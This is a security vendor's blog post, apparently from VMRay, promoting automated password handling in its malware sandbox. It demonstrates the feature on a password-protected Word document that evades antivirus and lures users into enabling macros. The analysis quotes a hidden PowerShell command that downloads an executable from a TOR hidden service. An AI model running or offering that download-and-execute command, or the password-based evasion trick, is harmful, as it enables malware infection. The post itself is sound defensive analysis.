Password Protected Word Document Connects to TOR Hidden Service
Password protected documents are an effective method for malware to bypass anti-virus (AV) and other detection solutions. Typically the AV will not be able to parse the password required from the text of the email used to send the malicious document. With VMRay Analyzer, it has always been possible to manually interact with malware using browser based VNC access. By disabling automatic interaction, users can manually enter the password during the process of interacting with malware.
In VMRay Analyzer v2.1, we’ve completely automated this process. Now users will be able to provide a password at the time of submission and the password will be entered during the behavioral analysis (Figure 1). This added functionality will remove the manual process thus saving DFIR Specialists and Malware Analysts valuable time.
We recently found a sample (thanks to Michael Gillespie) to demonstrate the enhanced automated analysis of password protected documents in VMRay Analyzer v2.1.
The password is only mentioned in the email (“See attachment […]. Password is 5558.”). So if you only have access to the attachment, you won’t be able to analyze it properly. This is also why this attack technique is great at staying undetected – just changing the password will lead to a different document. Virustotal scores 0 / 56 (Figure 2) in other words, no AV detected it as malicious.
With VMRay Analyzer v2.1, we are able to take the password, found within the body of the e-mail and enter it before analysis. After the analysis is done, we can see that the malware author tries to trick the user into believing the “Can’t View” message comes from Microsoft Word, so he should allow macros to run.
Our simulated user interaction is, of course, the best case scenario in every attacker’s eyes (and the worst case scenario for every sysadmin): VMRay Analyzer will do whatever is asked of it – like open the document and let macros run.
Let’s look at the spawned processes after a user enables macros to get a feel of what this malware does (Figure 4):
The macros start a batch file which then starts PowerShell to download and execute the actual payload:
powershell.exe -w hidden "(New-Object System.Net.WebClient). DownloadFile('hxxp://fbbkvm7ezghq4dx3.onion.link/msbus24.exe',' C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')"
Interestingly, this connects to a TOR hidden service, which is often seen in ransomware – of course, this behavior is a huge red flag, because there is basically no legitimate reason to hide an executable file behind TOR. This behavior is marked as a malicious in the ‘Detected Threats’ section of the Analysis Report (Figure 5).
As demonstrated with this analysis, the added support for automated password protected document analysis in VMRay Analyzer v2.1 gives DFIR Specialists and CERTs another tool in their arsenal to facilitate and automate the fight against malware.
View the Full Password Protected Word Document Analysis